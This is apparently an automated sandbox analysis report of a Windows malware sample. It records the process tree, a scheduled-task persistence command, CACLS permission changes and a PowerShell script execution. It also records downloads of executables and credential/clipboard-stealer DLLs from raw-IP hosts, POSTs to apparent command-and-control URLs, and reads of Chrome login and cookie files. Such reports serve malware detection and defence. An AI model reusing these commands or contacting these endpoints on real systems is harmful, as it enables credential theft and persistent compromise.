Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Oct. 26, 2023, 10:17 a.m. | Oct. 26, 2023, 10:19 a.m. |
-
-
-
-
-
-
-
AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2448
-
-
2ui982bJ.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\2ui982bJ.exe
2512
-
-
3zm3Dv28.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\3zm3Dv28.exe
2096
-
-
-
-
-
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x138,0x13c,0x140,0x10c,0x144,0x7fef2cd6e00,0x7fef2cd6e10,0x7fef2cd6e20
2976
-
-
-
-
-
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
1804 -
cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
2428-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2992 -
cacls.exe CACLS "explothe.exe" /P "test22:N"
2132 -
cacls.exe CACLS "explothe.exe" /P "test22:R" /E
2256 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2300 -
cacls.exe CACLS "..\fefffe8cea" /P "test22:N"
2496 -
cacls.exe CACLS "..\fefffe8cea" /P "test22:R" /E
2160
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\1000050041\2.ps1"
2656-
iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://accounts.google.com/
3184-
iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3184 CREDAT:145409
3376
-
-
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com/
3244-
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x138,0x13c,0x140,0x10c,0x144,0x7fef2cd6e00,0x7fef2cd6e10,0x7fef2cd6e20
3328
-
-
-
-
AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3368
-
-
-
-
-
-
-
-
AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3172
-
-
2Et342Hh.exe C:\Users\test22\AppData\Local\Temp\IXP005.TMP\2Et342Hh.exe
3144
-
-
-
-
-
-
-
AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3168
-
-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
3632
-
-
-
-
-
cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\451D.tmp\451E.tmp\451F.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6PS68mQ.exe"
1228-
-
iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1696 CREDAT:145409
2640
-
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
ssl.gstatic.com | 142.250.206.227 | |
accounts.google.com | 142.250.206.205 | |
www.youtube.com |
CNAME
youtube-ui.l.google.com
|
172.217.25.174 |
www.google.com | 142.250.76.132 | |
www.facebook.com | 157.240.215.35 |
IP Address | Status | Action |
---|---|---|
117.18.232.200 | Active | Moloch |
142.250.204.36 | Active | Moloch |
142.251.220.14 | Active | Moloch |
157.240.215.35 | Active | Moloch |
164.124.101.2 | Active | Moloch |
193.233.255.73 | Active | Moloch |
216.58.200.237 | Active | Moloch |
216.58.203.67 | Active | Moloch |
77.91.124.1 | Active | Moloch |
77.91.124.86 | Active | Moloch |
77.91.68.249 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49201 142.251.220.14:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.google.com | 71:34:f9:a1:80:2f:af:05:cb:45:8a:35:d5:48:03:3f:b3:6f:61:30 |
TLSv1 192.168.56.103:49203 157.240.215.35:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 0c:f7:12:d9:d4:67:aa:56:4d:68:2b:4c:90:81:cd:08:57:ad:f0:ad |
TLSv1 192.168.56.103:49207 216.58.200.237:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=accounts.google.com | 86:7b:0f:9a:a8:81:46:14:e8:56:c2:45:8b:8e:ff:52:da:1c:f4:18 |
TLSv1 192.168.56.103:49208 216.58.203.67:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.gstatic.com | be:d3:d2:0a:c4:57:fb:0b:d7:17:48:c8:ab:52:49:39:3e:e9:3c:60 |
TLSv1 192.168.56.103:49204 157.240.215.35:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 0c:f7:12:d9:d4:67:aa:56:4d:68:2b:4c:90:81:cd:08:57:ad:f0:ad |
TLSv1 192.168.56.103:49206 216.58.200.237:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=accounts.google.com | 86:7b:0f:9a:a8:81:46:14:e8:56:c2:45:8b:8e:ff:52:da:1c:f4:18 |
TLSv1 192.168.56.103:49220 216.58.200.237:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=accounts.google.com | 86:7b:0f:9a:a8:81:46:14:e8:56:c2:45:8b:8e:ff:52:da:1c:f4:18 |
TLSv1 192.168.56.103:49209 216.58.203.67:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.gstatic.com | be:d3:d2:0a:c4:57:fb:0b:d7:17:48:c8:ab:52:49:39:3e:e9:3c:60 |
TLSv1 192.168.56.103:49225 216.58.203.67:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.gstatic.com | be:d3:d2:0a:c4:57:fb:0b:d7:17:48:c8:ab:52:49:39:3e:e9:3c:60 |
TLSv1 192.168.56.103:49219 216.58.200.237:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=accounts.google.com | 86:7b:0f:9a:a8:81:46:14:e8:56:c2:45:8b:8e:ff:52:da:1c:f4:18 |
TLSv1 192.168.56.103:49226 216.58.203.67:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.gstatic.com | be:d3:d2:0a:c4:57:fb:0b:d7:17:48:c8:ab:52:49:39:3e:e9:3c:60 |
TLSv1 192.168.56.103:49230 142.250.204.36:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=www.google.com | 13:d2:e3:b0:25:78:80:d7:35:78:09:81:0d:21:ce:31:cb:ef:da:75 |
TLSv1 192.168.56.103:49231 142.250.204.36:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=www.google.com | 13:d2:e3:b0:25:78:80:d7:35:78:09:81:0d:21:ce:31:cb:ef:da:75 |
TLSv1 192.168.56.103:49233 142.250.204.36:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=www.google.com | 13:d2:e3:b0:25:78:80:d7:35:78:09:81:0d:21:ce:31:cb:ef:da:75 |
TLSv1 192.168.56.103:49232 142.250.204.36:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=www.google.com | 13:d2:e3:b0:25:78:80:d7:35:78:09:81:0d:21:ce:31:cb:ef:da:75 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
pdb_path | wextract.pdb |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH |
resource name | AVI |
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://193.233.255.73/loghub/master | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://77.91.124.1/theme/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.68.249/fuza/2.ps1 | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.68.249/fuza/tus.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.68.249/fuza/foto1661.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.68.249/fuza/nalo.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.124.1/theme/Plugins/cred64.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://77.91.124.1/theme/Plugins/clip64.dll |
request | POST http://193.233.255.73/loghub/master |
request | POST http://77.91.124.1/theme/index.php |
request | GET http://77.91.68.249/fuza/2.ps1 |
request | GET http://77.91.68.249/fuza/tus.exe |
request | GET http://77.91.68.249/fuza/foto1661.exe |
request | GET http://77.91.68.249/fuza/nalo.exe |
request | GET http://77.91.124.1/theme/Plugins/cred64.dll |
request | GET http://77.91.124.1/theme/Plugins/clip64.dll |
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
request | GET https://accounts.google.com/ |
request | GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F |
request | GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyzpjHxpq1INlvGNncWH3u8zcoYJ7-v1sB2hwU2EY24lJvyiM2sMyf-U-uZStEXfb2_J_j288Q |
request | GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyzOGFzuxGAg2e3DWgR266n9r5qQR7Zrm_rptfo9RAihsFAa9lZDZl4RK6XmLN3Nk2pDoW9bUg&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-268318837%3A1698283071925212 |
request | GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png |
request | GET https://accounts.google.com/_/bscframe |
request | GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeywvEr1d-fiWqWdBLl2arLIwhz5TAKS5Ub4o4j3ERjjUOyhcbjQnhhGNhoBp7mqC14wej4Mn |
request | GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeywLm9zKARhd3TW4v_bKsXTv35Vp7b1sZNUIHBh4-R3fXErE4ApIG4xaQw9ptWyWfEi9FpYQxg&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-150941688%3A1698283074308887 |
request | GET https://accounts.google.com/favicon.ico |
request | GET https://accounts.google.com/generate_204?x9IqeA |
request | GET https://accounts.google.com/generate_204?KIpSmg |
request | GET https://www.google.com/favicon.ico |
request | POST http://193.233.255.73/loghub/master |
request | POST http://77.91.124.1/theme/index.php |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma~RF4bc48b.TMP |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\cf218ff8-862f-46c5-9d5b-10a695d0a2d9.dmp |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-6539D10A-FD0.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3 |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\Qu3zm3mb.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\4GZ372Su.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP005.TMP\2Et342Hh.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\Fc9PG7Fq.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\rI1Jd4Eu.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP004.TMP\3xs5Gv98.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6PS68mQ.exe |
file | C:\Users\test22\AppData\Local\Temp\1000053051\nalo.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\Si0fQ9YY.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6ZK14bj.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\5vk20My.exe |
file | C:\Users\test22\AppData\Local\Temp\1000051051\tus.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP004.TMP\Bp2UD7lQ.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP004.TMP\1aP71bw7.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\3zm3Dv28.exe |
file | C:\Users\test22\AppData\Local\Temp\451D.tmp\451E.tmp\451F.bat |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\Oz2GJ1On.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\4VL270mi.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP005.TMP\1eH36Fz5.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\5Jp03OV.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\iW4Ox0uA.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\WF0kq6mf.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP004.TMP\2ui982bJ.exe |
file | C:\Users\test22\AppData\Local\Temp\1000050041\2.ps1 |
file | C:\Users\test22\AppData\Local\Temp\1000052051\foto1661.exe |
file | C:\Users\test22\AppData\Local\Temp\1000050041\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\451D.tmp\451E.tmp\451F.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6PS68mQ.exe" |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F |
cmdline | Powershell.exe -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\1000050041\2.ps1" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\1000050041\2.ps1" |
cmdline | "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F |
file | C:\Users\test22\AppData\Local\Temp\1000051051\tus.exe |
file | C:\Users\test22\AppData\Local\Temp\1000052051\foto1661.exe |
file | C:\Users\test22\AppData\Local\Temp\1000053051\nalo.exe |
file | C:\Users\test22\AppData\Local\Temp\1000053051\nalo.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP005.TMP\2Et342Hh.exe |
file | C:\Users\test22\AppData\Local\Temp\1000051051\tus.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\5vk20My.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP004.TMP\3xs5Gv98.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP005.TMP\1eH36Fz5.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\WF0kq6mf.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP004.TMP\Bp2UD7lQ.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\Si0fQ9YY.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\rI1Jd4Eu.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll |
file | C:\Users\test22\AppData\Local\Temp\1000052051\foto1661.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\4VL270mi.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6ZK14bj.exe |